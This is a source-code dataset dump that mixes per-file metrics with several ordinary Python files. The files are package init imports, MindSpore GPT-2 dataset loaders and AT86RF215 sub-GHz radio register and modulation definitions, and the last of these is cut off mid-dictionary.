| 15.7 | 74 | 0.726115 | 21 | 157 | 5 | 0.666667 | 0.209524 | 0.285714 | 0.361905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007463 | 0.146497 | 157 | 9 | 75 | 17.444444 | 0.776119 | 0.133758 | 0 | 0 | 0 | 0 | 0.134328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
2d018c98f4cddc28a1b4956990408358c5722fe2 | 324 | py | Python | pdip/integrator/initializer/execution/integration/__init__.py | ahmetcagriakca/pdip | c4c16d5666a740154cabdc6762cd44d98b7bdde8 | [
"MIT"
] | 2 | 2021-12-09T21:07:46.000Z | 2021-12-11T22:18:01.000Z | pdip/integrator/initializer/execution/integration/__init__.py | PythonDataIntegrator/pdip | c4c16d5666a740154cabdc6762cd44d98b7bdde8 | [
"MIT"
] | null | null | null | pdip/integrator/initializer/execution/integration/__init__.py | PythonDataIntegrator/pdip | c4c16d5666a740154cabdc6762cd44d98b7bdde8 | [
"MIT"
] | 3 | 2021-11-15T00:47:00.000Z | 2021-12-17T11:35:45.000Z | from .default_operation_integration_execution_initializer import DefaultOperationIntegrationExecutionInitializer
from .operation_integration_execution_initializer import OperationIntegrationExecutionInitializer
from .operation_integration_execution_initializer_factory import OperationIntegrationExecutionInitializerFactory
| 81 | 112 | 0.953704 | 23 | 324 | 12.956522 | 0.478261 | 0.201342 | 0.291946 | 0.402685 | 0.469799 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 324 | 3 | 113 | 108 | 0.955128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
2d1fbf2b32b42f298d8f9e2a2a4be68d03c9b4f3 | 72 | py | Python | cmip/__init__.py | permamodel/cmip | 1796f26f4785c723e68424360145c6f293886fea | [
"MIT"
] | null | null | null | cmip/__init__.py | permamodel/cmip | 1796f26f4785c723e68424360145c6f293886fea | [
"MIT"
] | 5 | 2018-01-17T21:34:43.000Z | 2018-05-18T14:58:39.000Z | cmip/__init__.py | permamodel/cmip | 1796f26f4785c723e68424360145c6f293886fea | [
"MIT"
] | null | null | null |
#import cmip
import cmip_model
import bmi_cmip
import cmip_utils as cu
| 12 | 23 | 0.833333 | 13 | 72 | 4.384615 | 0.538462 | 0.526316 | 0.491228 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 72 | 5 | 24 | 14.4 | 0.934426 | 0.152778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2d34cedd02f3f10d8977c68590e3e8c4931b9358 | 6,219 | py | Python | src/dataset.py | viewsetting/GPT2 | 0ee3b5c327ccbbb306899c3f3f5d258c259c348e | [
"Apache-2.0"
] | 4 | 2021-01-02T09:42:42.000Z | 2021-01-11T12:24:34.000Z | src/dataset.py | viewsetting/MindSpore-GPT2 | 0ee3b5c327ccbbb306899c3f3f5d258c259c348e | [
"Apache-2.0"
] | null | null | null | src/dataset.py | viewsetting/MindSpore-GPT2 | 0ee3b5c327ccbbb306899c3f3f5d258c259c348e | [
"Apache-2.0"
] | null | null | null | import os
import numpy as np
import mindspore.common.dtype as mstype
import mindspore.dataset as de
from .finetune_eval_config import gpt2_net_cfg
import mindspore.dataset.transforms.c_transforms as C
from mindspore.communication.management import init, get_rank, get_group_size
def create_language_model_dataset(device_num=1, repeat_count=1, rank_id=0, do_shuffle=True,
dataset_path="/data/tju/src/mindspore-dataset/wikitext2-train-mindrecord"):
type_cast_op = C.TypeCast(mstype.int32)
ds = de.MindDataset(dataset_path,
columns_list=["input_ids", "input_mask", "label_ids"],
shuffle=do_shuffle,
num_shards=device_num,
shard_id=rank_id)
print("batch_size: {}".format(gpt2_net_cfg.batch_size))
ds = ds.map(input_columns="input_ids", operations=type_cast_op)
ds = ds.map(input_columns="input_mask", operations=type_cast_op)
ds = ds.map(input_columns="label_ids", operations=type_cast_op)
# # apply shuffle operation
# buffer_size = 960
# ds = ds.shuffle(buffer_size=buffer_size)
# apply batch operations
ds = ds.batch(gpt2_net_cfg.batch_size, drop_remainder=True)
ds = ds.repeat(repeat_count)
print("dataset size: {}".format(ds.get_dataset_size()))
print("repeat count: {}".format(ds.get_repeat_count()))
print("output shape: {}".format(ds.output_shapes()))
print("output type: {}".format(ds.output_types()))
print("============== create dataset successful ===============")
# print(ds)
return ds
def create_cnn_dailymail_dataset(device_num=1, repeat_count=1, rank_id=0, do_shuffle=True,
dataset_path="/data/tju/src/mindspore-dataset/cnn_dailymail-train-mindrecord"):
type_cast_op = C.TypeCast(mstype.int32)
ds = de.MindDataset(dataset_path,
columns_list=["input_ids", "input_mask", "label_ids"],
shuffle=do_shuffle,
num_shards=device_num,
shard_id=rank_id)
print("batch_size: {}".format(gpt2_net_cfg.batch_size))
ds = ds.map(input_columns="input_ids", operations=type_cast_op)
ds = ds.map(input_columns="input_mask", operations=type_cast_op)
ds = ds.map(input_columns="label_ids", operations=type_cast_op)
# # apply shuffle operation
# buffer_size = 960
# ds = ds.shuffle(buffer_size=buffer_size)
# apply batch operations
ds = ds.batch(gpt2_net_cfg.batch_size, drop_remainder=True)
ds = ds.repeat(repeat_count)
print("dataset size: {}".format(ds.get_dataset_size()))
print("repeat count: {}".format(ds.get_repeat_count()))
print("output shape: {}".format(ds.output_shapes()))
print("output type: {}".format(ds.output_types()))
print("============== create dataset successful ===============")
# print(ds)
return ds
def create_translation_dataset(repeat_count=1, do_shuffle=True, dataset_path=None, target="Ascend"):
#device_num = get_group_size()
#rank_id = get_rank()
# print("*"*30+"[create_translation_dataset] device_num:{} rank_id:{}".format(device_num,rank_id))
device_num, rank_id = _get_rank_info()
print("-------| [dataset.py] {} (device), {} (target), {} (device numbers) |------".format(rank_id, target, device_num))
type_cast_op = C.TypeCast(mstype.int32)
ds = de.MindDataset(dataset_path,
columns_list=["input_ids", "input_mask", "label_ids"],
shuffle=do_shuffle,
num_shards=device_num,
shard_id=rank_id)
print("batch_size: {}".format(gpt2_net_cfg.batch_size))
ds = ds.map(input_columns="input_ids", operations=type_cast_op)
ds = ds.map(input_columns="input_mask", operations=type_cast_op)
ds = ds.map(input_columns="label_ids", operations=type_cast_op)
# # apply shuffle operation
# buffer_size = 960
# ds = ds.shuffle(buffer_size=buffer_size)
# apply batch operations
ds = ds.batch(gpt2_net_cfg.batch_size, drop_remainder=True)
ds = ds.repeat(repeat_count)
print("dataset size: {}".format(ds.get_dataset_size()))
print("repeat count: {}".format(ds.get_repeat_count()))
print("output shape: {}".format(ds.output_shapes()))
print("output type: {}".format(ds.output_types()))
print("============== create dataset successful ===============")
# print(ds)
return ds
def create_translation_dataset_single(device_num=1, repeat_count=1, rank_id=0, do_shuffle=True, dataset_path=None):
#device_num = get_group_size()
#rank_id = get_rank()
# print("*"*30+"[create_translation_dataset] device_num:{} rank_id:{}".format(device_num,rank_id))
type_cast_op = C.TypeCast(mstype.int32)
ds = de.MindDataset(dataset_path,
columns_list=["input_ids", "input_mask", "label_ids"],
shuffle=do_shuffle,
num_shards=device_num,
shard_id=rank_id)
print("batch_size: {}".format(gpt2_net_cfg.batch_size))
ds = ds.map(input_columns="input_ids", operations=type_cast_op)
ds = ds.map(input_columns="input_mask", operations=type_cast_op)
ds = ds.map(input_columns="label_ids", operations=type_cast_op)
# # apply shuffle operation
# buffer_size = 960
# ds = ds.shuffle(buffer_size=buffer_size)
# apply batch operations
ds = ds.batch(gpt2_net_cfg.batch_size, drop_remainder=True)
ds = ds.repeat(repeat_count)
print("dataset size: {}".format(ds.get_dataset_size()))
print("repeat count: {}".format(ds.get_repeat_count()))
print("output shape: {}".format(ds.output_shapes()))
print("output type: {}".format(ds.output_types()))
print("============== create dataset successful ===============")
# print(ds)
return ds
def _get_rank_info():
"""
Get the device group size and this device's rank id; falls back to (1, 0) when RANK_SIZE is unset or 1.
"""
rank_size = int(os.environ.get("RANK_SIZE", 1))
if rank_size > 1:
rank_size = get_group_size()
rank_id = get_rank()
else:
rank_size = 1
rank_id = 0
return rank_size, rank_id | 40.383117 | 124 | 0.643351 | 816 | 6,219 | 4.596814 | 0.117647 | 0.025593 | 0.042655 | 0.03839 | 0.858438 | 0.858438 | 0.849907 | 0.843242 | 0.843242 | 0.843242 | 0 | 0.009764 | 0.209519 | 6,219 | 154 | 125 | 40.383117 | 0.753255 | 0.127352 | 0 | 0.75 | 0 | 0 | 0.179454 | 0.022292 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052083 | false | 0 | 0.072917 | 0 | 0.177083 | 0.260417 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
745d1ef8bce8b99d4daf331dddd355b3c91dd278 | 181 | py | Python | sccl/__init__.py | cowanmeg/sccl | 2d1a34e45982471d3df32ad2974ba86657186517 | [
"MIT"
] | 26 | 2021-06-15T00:54:14.000Z | 2022-03-26T13:04:24.000Z | sccl/__init__.py | cowanmeg/sccl | 2d1a34e45982471d3df32ad2974ba86657186517 | [
"MIT"
] | 5 | 2021-05-25T23:32:48.000Z | 2022-02-16T02:37:06.000Z | sccl/__init__.py | cowanmeg/sccl | 2d1a34e45982471d3df32ad2974ba86657186517 | [
"MIT"
] | 8 | 2021-06-30T23:07:44.000Z | 2022-03-03T23:17:28.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from sccl.autosynth import init
from sccl.autosynth import ndv2_perm
from sccl.autosynth import Collective
| 25.857143 | 38 | 0.81768 | 25 | 181 | 5.88 | 0.68 | 0.163265 | 0.346939 | 0.469388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006369 | 0.132597 | 181 | 6 | 39 | 30.166667 | 0.929936 | 0.375691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
77d210ae34ced7def1e654d008f35f5e749ce7e0 | 54,939 | py | Python | raspberry/at86rf215_defs.py | openwsn-berkeley/range_test | 20345bd20feab2fa69f444aba0d3ad6176cd6b0f | [
"BSD-2-Clause"
] | 2 | 2020-01-08T19:22:19.000Z | 2020-06-03T12:19:56.000Z | raspberry/at86rf215_defs.py | openwsn-berkeley/range_test | 20345bd20feab2fa69f444aba0d3ad6176cd6b0f | [
"BSD-2-Clause"
] | 23 | 2017-01-16T13:57:07.000Z | 2017-06-22T12:53:22.000Z | raspberry/at86rf215_defs.py | openwsn-berkeley/range_test | 20345bd20feab2fa69f444aba0d3ad6176cd6b0f | [
"BSD-2-Clause"
] | 2 | 2016-12-16T11:09:27.000Z | 2019-10-29T11:31:36.000Z | """
Register identifiers for the AT86RF215 sub-GHz radio.
\author Jonathan Munoz (jonathan.munoz@inria.fr), January 2017
"""
# MACROS
IRQS_TXFE_MASK = 0x10
IRQS_TRXRDY_MASK = 0x02
IRQS_RXFS_MASK = 0x01
IRQS_RXFE_MASK = 0x02
# commands
CMD_RF_NOP = 0x0
CMD_RF_SLEEP = 0x1
CMD_RF_TRXOFF = 0x2
CMD_RF_TXPREP = 0x3
CMD_RF_TX = 0x4
CMD_RF_RX = 0x5
CMD_RF_RESET = 0x7
# states
RF_STATE_TRXOFF = 0x2
RF_STATE_TXPREP = 0x3
RF_STATE_TX = 0x4
RF_STATE_RX = 0x5
RF_STATE_TRANSITION = 0x6
RF_STATE_RESET = 0x7
# Radio IRQ Status
IRQS_WAKEUP = 0x01
IRQS_TRXRDY = 0x02
IRQS_EDC = 0x04
IRQS_BATLOW = 0x08
IRQS_TRXERR = 0x10
IRQS_IQIFSF = 0x20
# baseband IRQ Status
IRQS_RXFS = 0x01
IRQS_RXFE = 0x02
IRQS_RXAM = 0x04
IRQS_RXEM = 0x08
IRQS_TXFE = 0x10
IRQS_AGCH = 0x20
IRQS_AGCR = 0x40
IRQS_FBLI = 0x80
# reset command
RST_CMD = 0x07
# register addresses (16-bit)
RG_RF09_IRQS = [0x00, 0x00]
RG_RF24_IRQS = [0x00, 0x01]
RG_BBC0_IRQS = [0x00, 0x02]
RG_BBC1_IRQS = [0x00, 0x03]
RG_RF_RST = [0x00, 0x05]
RG_RF_CFG = [0x00, 0x06]
RG_RF_CLKO = [0x00, 0x07]
RG_RF_BMDVC = [0x00, 0x08]
RG_RF_XOC = [0x00, 0x09]
RG_RF_IQIFC0 = [0x00, 0x0A]
RG_RF_IQIFC1 = [0x00, 0x0B]
RG_RF_IQIFC2 = [0x00, 0x0C]
RG_RF_PN = [0x00, 0x0D]
RG_RF_VN = [0x00, 0x0E]
RG_RF09_IRQM = [0x01, 0x00]
RG_RF09_AUXS = [0x01, 0x01]
RG_RF09_STATE = [0x01, 0x02]
RG_RF09_CMD = [0x01, 0x03]
RG_RF09_CS = [0x01, 0x04]
RG_RF09_CCF0L = [0x01, 0x05]
RG_RF09_CCF0H = [0x01, 0x06]
RG_RF09_CNL = [0x01, 0x07]
RG_RF09_CNM = [0x01, 0x08]
RG_RF09_RXBWC = [0x01, 0x09]
RG_RF09_RXDFE = [0x01, 0x0A]
RG_RF09_AGCC = [0x01, 0x0B]
RG_RF09_AGCS = [0x01, 0x0C]
RG_RF09_RSSI = [0x01, 0x0D]
RG_RF09_EDC = [0x01, 0x0E]
RG_RF09_EDD = [0x01, 0x0F]
RG_RF09_EDV = [0x01, 0x10]
RG_RF09_RNDV = [0x01, 0x11]
RG_RF09_TXCUTC = [0x01, 0x12]
RG_RF09_TXDFE = [0x01, 0x13]
RG_RF09_PAC = [0x01, 0x14]
RG_RF24_IRQM = [0x02, 0x00]
RG_RF24_AUXS = [0x02, 0x01]
RG_RF24_STATE = [0x02, 0x02]
RG_RF24_CMD = [0x02, 0x03]
RG_RF24_CS = [0x02, 0x04]
RG_RF24_CCF0L = [0x02, 0x05]
RG_RF24_CCF0H = [0x02, 0x06]
RG_RF24_CNL = [0x02, 0x07]
RG_RF24_CNM = [0x02, 0x08]
RG_RF24_RXBWC = [0x02, 0x09]
RG_RF24_RXDFE = [0x02, 0x0A]
RG_RF24_AGCC = [0x02, 0x0B]
RG_RF24_AGCS = [0x02, 0x0C]
RG_RF24_RSSI = [0x02, 0x0D]
RG_RF24_EDC = [0x02, 0x0E]
RG_RF24_EDD = [0x02, 0x0F]
RG_RF24_EDV = [0x02, 0x10]
RG_RF24_RNDV = [0x02, 0x11]
RG_RF24_TXCUTC = [0x02, 0x12]
RG_RF24_TXDFE = [0x02, 0x13]
RG_RF24_PAC = [0x02, 0x14]
RG_BBC0_IRQM = [0x03, 0x00]
RG_BBC0_PC = [0x03, 0x01]
RG_BBC0_PS = [0x03, 0x02]
RG_BBC0_RXFLL = [0x03, 0x04]
RG_BBC0_RXFLH = [0x03, 0x05]
RG_BBC0_TXFLL = [0x03, 0x06]
RG_BBC0_TXFLH = [0x03, 0x07]
RG_BBC0_FBLL = [0x03, 0x08]
RG_BBC0_FBLH = [0x03, 0x09]
RG_BBC0_FBLIL = [0x03, 0x0A]
RG_BBC0_FBLIH = [0x03, 0x0B]
RG_BBC0_OFDMPHRTX = [0x03, 0x0C]
RG_BBC0_OFDMPHRRX = [0x03, 0x0D]
RG_BBC0_OFDMC = [0x03, 0x0E]
RG_BBC0_OFDMSW = [0x03, 0x0F]
RG_BBC0_OQPSKC0 = [0x03, 0x10]
RG_BBC0_OQPSKC1 = [0x03, 0x11]
RG_BBC0_OQPSKC2 = [0x03, 0x12]
RG_BBC0_OQPSKC3 = [0x03, 0x13]
RG_BBC0_OQPSKPHRTX = [0x03, 0x14]
RG_BBC0_OQPSKPHRRX = [0x03, 0x15]
RG_BBC0_FSKC0 = [0x03, 0x60]
RG_BBC0_FSKC1 = [0x03, 0x61]
RG_BBC0_FSKC2 = [0x03, 0x62]
RG_BBC0_FSKC3 = [0x03, 0x63]
RG_BBC0_FSKC4 = [0x03, 0x64]
RG_BBC0_FSKPHRTX = [0x03, 0x6A]
RG_BBC0_FSKPHRRX = [0x03, 0x6B]
RG_BBC0_FSKDM = [0x03, 0x72]
RG_BBC0_FSKPE0 = [0x03, 0x73]
RG_BBC0_FSKPE1 = [0x03, 0x74]
RG_BBC0_FSKPE2 = [0x03, 0x75]
RG_BBC0_FSKSDF0L = [0x03, 0x66]
RG_BBC0_FSKSDF0H = [0x03, 0x67]
RG_BBC0_FSKSDF1L = [0x03, 0x68]
RG_BBC0_FSKSDF1H = [0x03, 0x69]
RG_BBC1_IRQM = [0x04, 0x00]
RG_BBC1_PC = [0x04, 0x01]
RG_BBC1_PS = [0x04, 0x02]
RG_BBC1_RXFLL = [0x04, 0x04]
RG_BBC1_RXFLH = [0x04, 0x05]
RG_BBC1_TXFLL = [0x04, 0x06]
RG_BBC1_TXFLH = [0x04, 0x07]
RG_BBC1_FBLL = [0x04, 0x08]
RG_BBC1_FBLH = [0x04, 0x09]
RG_BBC1_FBLIL = [0x04, 0x0A]
RG_BBC1_FBLIH = [0x04, 0x0B]
RG_BBC1_OFDMPHRTX = [0x04, 0x0C]
RG_BBC1_OFDMPHRRX = [0x04, 0x0D]
RG_BBC1_OFDMC = [0x04, 0x0E]
RG_BBC1_OFDMSW = [0x04, 0x0F]
RG_BBC1_OQPSKC0 = [0x04, 0x10]
RG_BBC1_OQPSKC1 = [0x04, 0x11]
RG_BBC1_OQPSKC2 = [0x04, 0x12]
RG_BBC1_OQPSKC3 = [0x04, 0x13]
RG_BBC1_OQPSKPHRTX = [0x04, 0x14]
RG_BBC1_OQPSKPHRRX = [0x04, 0x15]
RG_BBC1_FSKC0 = [0x04, 0x60]
RG_BBC1_FSKC1 = [0x04, 0x61]
RG_BBC1_FSKC2 = [0x04, 0x62]
RG_BBC1_FSKC3 = [0x04, 0x63]
RG_BBC1_FSKC4 = [0x04, 0x64]
RG_BBC1_FSKPHRTX = [0x04, 0x6A]
RG_BBC1_FSKPHRRX = [0x04, 0x6B]
RG_BBC1_FSKDM = [0x04, 0x72]
RG_BBC1_FSKPE0 = [0x04, 0x73]
RG_BBC1_FSKPE1 = [0x04, 0x74]
RG_BBC1_FSKPE2 = [0x04, 0x75]
RG_BBC1_FSKSDF0L = [0x04, 0x66]
RG_BBC1_FSKSDF0H = [0x04, 0x67]
RG_BBC1_FSKSDF1L = [0x04, 0x68]
RG_BBC1_FSKSDF1H = [0x04, 0x69]
RG_BBC0_FBRXS = [0x20, 0x00]
RG_BBC0_FBRXE = [0x27, 0xFE]
RG_BBC0_FBTXS = [0x28, 0x00]
RG_BBC0_FBTXE = [0x2F, 0xFE]
RG_BBC1_FBRXS = [0x30, 0x00]
RG_BBC1_FBRXE = [0x37, 0xFE]
RG_BBC1_FBTXS = [0x38, 0x00]
RG_BBC1_FBTXE = [0x3F, 0xFE]
OFDMPHRRX_MCS_MASK = 0x07
modulations_settings_ch_spacing = {
'2fsk_50kbps_FEC_200kHz' : [200, 863125],
'2fsk_100kbps_FEC_400kHz' : [400, 863225],
'4fsk_200kbps_FEC_400kHz' : [400, 863225],
'2fsk_50kbps_200kHz' : [200,863125],
'2fsk_100kbps_400kHz' : [400,863225],
'4fsk_200kbps_400kHz' : [400,863225],
'ofdm_100kbps_1200kHz_mcs0' : [1200,863625],
'ofdm_200kbps_1200kHz_mcs1' : [1200,863625],
'ofdm_400kbps_1200kHz_mcs2' : [1200,863625],
'ofdm_800kbps_1200kHz_mcs3' : [1200,863625],
'ofdm_50kbps_800kHz_mcs0' : [800,863425],
'ofdm_100kbps_800kHz_mcs1' : [800,863425],
'ofdm_200kbps_800kHz_mcs2' : [800,863425],
'ofdm_400kbps_800kHz_mcs3' : [800,863425],
'ofdm_600kbps_800kHz_mcs4' : [800,863425],
'ofdm_800kbps_800kHz_mcs5' : [800,863425],
'ofdm_50kbps_400kHz_mcs1' : [400,863225],
'ofdm_100kbps_400kHz_mcs2' : [400,863225],
'ofdm_200kbps_400kHz_mcs3' : [400,863225],
'ofdm_300kbps_400kHz_mcs4' : [400,863225],
'ofdm_400kbps_400kHz_mcs5' : [400,863225],
'ofdm_600kbps_400kHz_mcs6' : [400,863225],
'ofdm_50kbps_200kHz_mcs2' : [200,863125],
'ofdm_100kbps_200kHz_mcs3' : [200,863125],
'ofdm_150kbps_200kHz_mcs4' : [200,863125],
'ofdm_200kbps_200kHz_mcs5' : [200,863125],
'ofdm_300kbps_200kHz_mcs6' : [200,863125],
# The '600kHz' in these keys looks wrong: the configured spacing is 100 kHz.
'oqpsk_6.25kbps_600kHz' : [100,868300],
'oqpsk_12.5kbps_600kHz' : [100,868300],
'oqpsk_25kbps_600kHz' : [100,868300],
'oqpsk_50kbps_600kHz' : [100,868300]
}
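Each entry in the table above pairs a channel spacing (kHz) with the channel-0 center frequency (kHz). A small illustration of unpacking an entry (the helper name is made up, the two rows are copied from the dict above, and stepping channels by exactly one spacing is an assumption for the example):

```python
# Two rows copied from modulations_settings_ch_spacing for a self-contained demo.
modulations_settings_ch_spacing_sample = {
    '2fsk_50kbps_200kHz': [200, 863125],
    'ofdm_50kbps_800kHz_mcs0': [800, 863425],
}

def channel_center(setting, channel):
    """Center frequency (kHz) of `channel` for the given PHY setting."""
    spacing_khz, cf0_khz = modulations_settings_ch_spacing_sample[setting]
    return cf0_khz + channel * spacing_khz

freq = channel_center('2fsk_50kbps_200kHz', 3)  # 863125 + 3 * 200
```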
modulations_settings = {
# fsk_option1_FEC
'2fsk_50kbps_FEC_200kHz': [
(RG_RF09_CMD, 0x02), # we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00),
(RG_RF09_RXDFE, 0x2A), # RCUT = 1, bits 5-7. bit 4 not used.
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0xC0),
(RG_RF09_TXDFE, 0x98),
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # TXFE, RXFE, interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKC0, 0xD6),
(RG_BBC0_FSKC1, 0x00),
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x0A), # //FEC enabled. IEEE MODE
(RG_BBC0_FSKPE0, 0x02),
(RG_BBC0_FSKPE1, 0x03),
(RG_BBC0_FSKPE2, 0xFC),
(RG_BBC0_FSKPHRTX, 0x00)],
# fsk_option2_FEC
'2fsk_100kbps_FEC_400kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x03),
(RG_RF09_RXDFE, 0x25), # RCUT = 1, bits 5-7. bit 4 not used.
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x83),
(RG_RF09_TXDFE, 0x94),
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # TXFE and RXFE interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKC0, 0xD6),
(RG_BBC0_FSKC1, 0x01),
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x0A), # //FEC enabled. IEEE MODE
(RG_BBC0_FSKPE0, 0x0E),
(RG_BBC0_FSKPE1, 0x0F),
(RG_BBC0_FSKPE2, 0xF0),
(RG_BBC0_FSKPHRTX, 0x00)],
# fsk_option3_FEC
'4fsk_200kbps_FEC_400kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x03), # //IF shift, 200 kHz bandwidth
(RG_RF09_RXDFE, 0x25), # //find the right values
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x83), #
(RG_RF09_TXDFE, 0x94), # //find the right values
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # // TXFE, RXFE interrupts enabled. RXFS , RXEM, RXAM, disabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKSDF0L, 0xBE),
(RG_BBC0_FSKSDF0H, 0xFF),
# (RG_BBC0_FSKSDF1L, 0xAE),
# (RG_BBC0_FSKSDF1H, 0xBF),
(RG_BBC0_FSKC0, 0xD7),
(RG_BBC0_FSKC1, 0x01), # 1 = 100 kHz symbol rate, 3 = 200 kHz
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x22),
(RG_BBC0_FSKPE0, 0x0E),
(RG_BBC0_FSKPE1, 0x0F),
(RG_BBC0_FSKPE2, 0xF0),
(RG_BBC0_FSKPHRTX, 0x00)],
# fsk_option1
'2fsk_50kbps_200kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # 0 IFS, 50 kHz symbol rate
(RG_RF09_RXDFE, 0x2A), # RCUT = 1 , SR = 10
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0xC0),
(RG_RF09_TXDFE, 0x98),
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # TXFE and RXFE interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKC0, 0xD6),
(RG_BBC0_FSKC1, 0x00),
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x00), # //FEC disabled. IEEE MODE
(RG_BBC0_FSKPE0, 0x02),
(RG_BBC0_FSKPE1, 0x03),
(RG_BBC0_FSKPE2, 0xFC),
(RG_BBC0_FSKPHRTX, 0x08)], # using SDF 1
# fsk_option2
'2fsk_100kbps_400kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x03), # 0 IFS, 100 kHz symbol rate
